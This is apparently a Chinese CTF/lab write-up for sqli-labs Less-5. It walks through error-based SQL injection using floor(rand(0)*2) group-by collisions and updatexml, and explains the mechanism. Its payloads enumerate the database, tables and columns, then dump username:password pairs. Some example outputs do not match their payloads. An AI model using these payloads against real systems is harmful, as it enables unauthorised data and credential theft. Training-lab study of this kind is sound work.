【CTF-WEB-SQL】SQL注入基本流程-错误注入(sql-labs的Less5)(updatexml)

print_Hyon2025-07-27 13:19

针对 Less-5 的实战利用

步骤一:获取数据库名
方法一:
sql 复制代码 
http://223.112.39.132:46157/Less-5/?id=1' 
union select 1, count(*), 
concat(
  (select database()), 
  '---', 
  floor(rand(0)*2)
) as a 
from information_schema.tables 
group by a --+

结果示例:

text 复制代码 
Duplicate entry 'security---1' for key 'group_key'

✅ 数据库名 = security

方法二:
sql 复制代码 
http://223.112.39.132:46157/Less-5/?id=1' 
and updatexml(1, concat(0x7e, (select database()), 0x7e), 1) --+

结果示例:

text 复制代码 
XPATH syntax error: '~security~'

✅ 数据库名 = security

步骤二:获取所有表名
sql 复制代码 
http://223.112.39.132:46157/Less-5/?id=1' 
and updatexml(1, concat(0x7e, (
  select group_concat(table_name) 
  from information_schema.tables 
  where table_schema=database()
), 0x7e), 1) --+

结果示例:

text 复制代码 
Duplicate entry 'emails,referers,uagents,users---0' for key 'group_key'

✅ 表名 = emails, referers, uagents, users

步骤三:获取字段名(以users表为例)
sql 复制代码 
http://223.112.39.132:46157/Less-5/?id=1' 
and updatexml(1, concat(0x7e, (
select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'
), 0x7e), 1) --+

结果示例:

text 复制代码 
XPATH syntax error: '~id,username,password~'

✅ 字段 = emails,referers,uagents,users

步骤四:拖取敏感数据
sql 复制代码 
http://223.112.39.132:46157/Less-5/?id=1' 
and updatexml(1, concat(0x7e, (
  select group_concat(username,':',password) 
   from users
), 0x7e), 1) --+

结果示例:

sql 复制代码 
Duplicate entry 'Dumb:Dumb,Angelina:I-kill-you,...---0' for key 'group_key'

✅ 用户名密码 = Dumb:Dumb, Angelina:I-kill-you, ...

为什么这个方法在Less-5有效?

  1. 漏洞特性

    • 页面不显示查询结果,但显示SQL错误信息
    • rand(0)的确定性序列是触发报错的关键

  2. 优势对比

    方法 请求次数 速度 复杂度
    布尔盲注 数百次
    时间盲注 数百次 极慢
    报错注入 1次 即时

  3. 防御绕过

    即使应用不返回查询结果,只要泄露错误信息,此方法就有效

报错注入原理分析(针对您的Payload)

sql 复制代码 
?id=1' 
union select 1, count(*), 
concat(
  (select database()),  -- 获取数据库名
  '---', 
  floor(rand(0)*2)      -- 生成随机数0或1
) as a 
from information_schema.tables 
group by a --+

关键技术点floor

  1. floor(rand(0)*2)

    • 固定种子0rand()会生成可预测序列:0,1,1,0,1,1...
    • floor(rand(0)*2) 结果序列:0,1,1,0,1,1...

  2. group by + count(*)

    • 当使用group by对虚拟列a分组时:
      • 首次遇到新值 → 建立新分组
      • 再次遇到相同值 → 增加计数
    • 关键漏洞 :MySQL 在建立分组时先计算rand()值再判断是否存在分组

  3. 触发报错的流程

    行号 rand() 操作 结果
    1 0 创建分组 dbname---0 成功
    2 1 创建分组 dbname---1 成功
    3 1 增加分组 dbname---1计数 成功
    4 0 尝试增加分组 dbname---0计数 ⚠️ 但此时分组未创建(rand()序列特性)→ 报错

  4. 报错信息泄露数据

    错误消息会包含导致冲突的虚拟列值:

    sql 复制代码 
    Duplicate entry 'security---0' for key 'group_key'

    其中 security 就是数据库名!

相关推荐
ad禥思妙想15 小时前
[LitCTF 2023]OSINT 探姬去哪了?【0~3】
ctf·misc
ad禥思妙想19 小时前
NSSCTF_MISC_WP_刷题记录(四)
ctf·misc
WayneJoon.H3 天前
2023CISCN go_session
网络安全·golang·ctf·代码审计·ciscn
23zhgjx-zgx4 天前
HTTP网络攻击分析
网络·ctf
Lethehong5 天前
第二届“启航杯“网络安全挑战赛开始啦!
安全·web安全·ctf·启航杯
蓝之白5 天前
流量分析_SnakeBackdoor-6
web安全·ctf·流量分析·逆向分析
clown_YZ6 天前
HKCERTCTF2025--解题记录
ctf·漏洞利用·漏洞原理
给勒布朗上上对抗呀6 天前
NginxDeny绕过-玄武杯2025-眼见不为实
ctf
蓝之白7 天前
流量分析_SnakeBackdoor-1~6
web安全·ctf·流量分析·逆向分析
蓝之白8 天前
Web15-网站被黑
web安全·ctf
热门推荐
01GitHub 镜像站点02网站改了域名,如何查找?03Labelme从安装到标注:零基础完整指南04Linux下V2Ray安装配置指南05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)062025-04-03 Latex学习1——本地配置Latex + VScode环境07【踩坑笔记】50系显卡适配的 PyTorch 安装08AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南09UV安装并设置国内源10Windows 系统中修改文件默认打开方式